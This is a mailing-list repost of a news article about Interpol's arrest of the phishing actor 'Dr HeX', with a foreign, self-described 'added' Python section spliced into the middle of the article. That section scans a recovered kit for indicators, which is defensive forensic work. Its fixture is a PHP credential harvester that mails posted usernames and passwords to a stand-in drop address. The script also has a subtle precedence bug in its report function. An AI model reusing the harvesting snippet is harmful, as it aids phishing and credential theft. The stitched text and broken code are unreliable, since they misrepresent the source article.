[BreachExchange] Interpol Arrests Moroccan Hacker Engaged in Nefarious Cyber Activities

Sophia Kingsbury sophia.kingsbury at riskbasedsecurity.com
Wed Jul 7 10:29:07 EDT 2021


https://thehackernews.com/2021/07/interpol-arrests-hacker-in-morocco-who.html

Law enforcement authorities with Interpol have apprehended a threat
actor responsible for targeting thousands of unwitting victims over several
years and staging malware attacks on telecom companies, major banks, and
multinational corporations in France as part of a global phishing and
credit card fraud scheme.

The two-year investigation, dubbed Operation Lyrebird by the international,
intergovernmental organization, resulted in the arrest of a Moroccan
citizen nicknamed Dr HeX, cybersecurity firm Group-IB disclosed today in a
report shared with The Hacker News.

Dr HeX is said to have been "active since at least 2009 and is responsible
for a number of cybercrimes, including phishing, defacing, malware
development, fraud, and carding that resulted in thousands of unsuspecting
victims," the cybersecurity firm said.

The cyber attacks involved deploying a phishing kit consisting of web pages
that spoofed banking entities in the country, followed by sending mass
emails mimicking the targeted companies, prompting email recipients to
enter login information on the rogue website.

The credentials entered by unsuspecting victims on the fake web page were
then redirected to the perpetrator's email. At least three different
phishing kits presumably developed by the threat actor have been extracted.

The phishing kits were also "sold to other individuals through online
forums to allow them to facilitate similar malicious campaigns against
victims," Interpol said in a statement. "These were then used to
impersonate online banking facilities, allowing the suspect and others to
steal sensitive information and defraud trusting individuals for financial
gain, with the losses of individuals and companies published online in
order to advertise these malicious services."

The scripts included in the phishing kit contained the name Dr HeX and the
individual's contact email address, through which the cybercriminal was
eventually identified and deanonymized. That process also uncovered a YouTube
channel, as well as another name used by the adversary to register at least
two fraudulent domains that were used in the attacks.
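The two passages above describe the same two artifacts a kit analyst looks for: the address that harvested credentials are mailed to, and the operator identifiers left in comments. The following is an added triage script, not code from the article, from Group-IB, or from any real kit; the PHP snippets it scans are constructed for illustration and every name, address and handle in them is an assumption. It walks a kit's files, pulls out every email address, "coded by" handle and the files that actually perform the exfiltration (a `mail()` call fed from `$_POST`), so that an incident responder can pivot from a recovered kit to its operator's infrastructure.

```python
"""Triage a recovered phishing kit for operator indicators (added example)."""
import re
from collections import Counter

# Constructed stand-in for a credential-harvesting kit. The file contents,
# the drop address and the handle are assumptions, not real kit material.
SAMPLE_KIT = {
    "login.php": """<?php
// Coded by Dr_Example - contact on forum
$to = "dropbox.example@example.com";
$subject = "New login | " . $_SERVER['REMOTE_ADDR'];
$message = "User: " . $_POST['user'] . "\\nPass: " . $_POST['pass'];
mail($to, $subject, $message);
header("Location: https://bank.example/");
?>""",
    "config.php": """<?php
$recipients = array("dropbox.example@example.com", "backup.example@example.org");
?>""",
    "index.html": "<html><form action='login.php' method='post'></form></html>",
}

# Any email address literal in the source: candidate drop / contact address.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Author credit left in a comment ("Coded by X", "Made by X", ...).
HANDLE_RE = re.compile(r"(?i)\b(?:coded|made|developed)\s+by\s+([A-Za-z0-9_\-]+)")
# A file that both reads submitted form fields and sends mail is the
# exfiltration point of the kit.
MAIL_CALL_RE = re.compile(r"\bmail\s*\(")
POST_READ_RE = re.compile(r"\$_POST\s*\[")


def extract_indicators(files):
    """Return emails (with occurrence counts), author handles and the
    names of files that mail harvested form input, for a dict of
    {filename: source text}."""
    emails = Counter()
    handles = set()
    exfil_files = []
    for name in sorted(files):
        src = files[name]
        emails.update(EMAIL_RE.findall(src))
        handles.update(HANDLE_RE.findall(src))
        if MAIL_CALL_RE.search(src) and POST_READ_RE.search(src):
            exfil_files.append(name)
    return {"emails": emails, "handles": handles, "exfil_files": exfil_files}


def report(indicators):
    """Render the indicators as a short text report for an analyst."""
    lines = ["Exfiltration files: " + ", ".join(indicators["exfil_files"]) or "none"]
    lines.append("Drop / contact addresses:")
    for addr, n in indicators["emails"].most_common():
        lines.append(f"  {addr} ({n} occurrence{'s' if n != 1 else ''})")
    lines.append("Author handles: " + (", ".join(sorted(indicators["handles"])) or "none"))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(extract_indicators(SAMPLE_KIT)))
```

The address that appears most often across the kit is usually the live drop; an address that appears in a single backup list is worth checking separately, because kits resold on forums often keep the original author's address alongside the buyer's.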

Additionally, Group-IB said it was also able to map the email address to
the malicious infrastructure employed by the accused in various phishing
campaigns, which included as many as five email addresses, six
nicknames, and his accounts on Skype, Facebook, Instagram, and YouTube.

In all, Dr HeX's digital footprint left a tell-tale trail of malicious
activities over a period stretching between 2009 and 2018, during which the
threat actor defaced no fewer than 134 web pages. Investigators also found
posts created by the attacker on different underground forums devoted to
malware trading, and evidence suggesting his involvement in attacks on French
corporations to steal financial information.

"The suspect, in particular, promoted so-called Zombi Bot, which allegedly
contained 814 exploits, including 72 private ones, a brute-forcer, webshell
and backdoor scanners, as well as functionality to carry out DDoS attacks,"
Group-IB CTO Dmitry Volkov told The Hacker News.